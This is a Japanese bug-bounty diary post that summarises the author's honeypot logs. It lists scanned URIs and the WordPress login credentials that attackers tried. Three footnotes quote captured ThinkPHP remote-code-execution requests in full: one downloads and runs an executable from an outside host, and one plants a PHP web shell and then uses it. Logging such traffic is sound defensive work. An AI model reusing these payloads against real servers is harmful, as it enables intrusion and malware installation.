【BugBounty】 2019年6月10日 活動日記【Honeypot】

f:id:NickShadows:20190610223346j:plain

※hackerone経由で公式にwebの調査をしています。

バグバウンティ

やろうとしたこと

  1. 実践

やったこと

  1. ブログ記事作成

1.ブログ記事作成

ふと思い立って、バグバウンティを楽しむことを忘れないために作成しました。
ジャンルは自己啓発系になりますが、バグバウンティをやるには自分には必要でした。

www.nicksecuritylog.com



後、入門向けの必要知識まとめとか、脆弱性が見つかるポイントとかをまとめなきゃ。


次やりたいこと

  1. OWASP juice 検証
  2. 入門向け資料作成(非公開)

気になったもの

ハニーポット

トップ画面


直近1ヶ月折れ線グラフ


GETリクエスト

no uri Co
1 / 51
2 /wp-login.php 17
3 /user/login.html 2
4 /echo.php 2
5 *1 1
6 *2 1
7 *3 1
8 /.well-known/security.txt 1
9 /favicon.ico 1
10 /robots.txt 1
11 /sitemap.xml 1
12 /simpla/ 1
13 /admin/ 1
14 /js/mage/cookies.js 1
15 /admin/content/sitetree/ 1
16 ///wp-json/wp/v2/users/ 1
17 ///?author=1 1
18 /wp-json/wp/v2/users/ 1
19 /fastenv 1
20 /js/cms/panel/panel.js 1
21 /manager/assets/modext/modx.jsgrps-min.js 1
22 /media/system/js/core.js 1
23 /privacy_policy.php 1
24 /misc/drupal.js 1
25 /,3.13.8.118 1
26 /cgi-bin/authLogin.cgi 1
27 /manager/ 1

*1

/public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http[:]//fid.hognoob.se/download.exe','%SystemRoot%/Temp/sqtxlvcaicmxfzc8185.exe');start%20%SystemRoot%/Temp/sqtxlvcaicmxfzc8185.exe

*2

/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^<?php%20$action%20=%20$_GET['xcmd'];system($action);?^>>hydra.php

*3

/public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http[:]//fid.hognoob.se/download.exe','%SystemRoot%/Temp/sqtxlvcaicmxfzc8185.exe');start%20%SystemRoot%/Temp/sqtxlvcaicmxfzc8185.exe


POSTリクエスト

※パラメータが多いため省略。wordpressです。


pypmyadminユーザー

アクセスなし


pypmyadminパスワード

アクセスなし


wordpressユーザー

no user Co
1 admin 7
2 7
3 [login] 1


wordpressパスワード

no pwd Co
1 null 7
2 admim 1
3 [login] 1
4 admin1234 1
5 admin123 1
6 admin 1
7 onlinedocumentsite 1
8 admin@123 1
9 admin@1234 1


tomcatユーザー

アクセスなし


tomcatパスワード

アクセスなし


直近24時間新着アクセス

なし


まとめ

wordpressしか来なくなりました。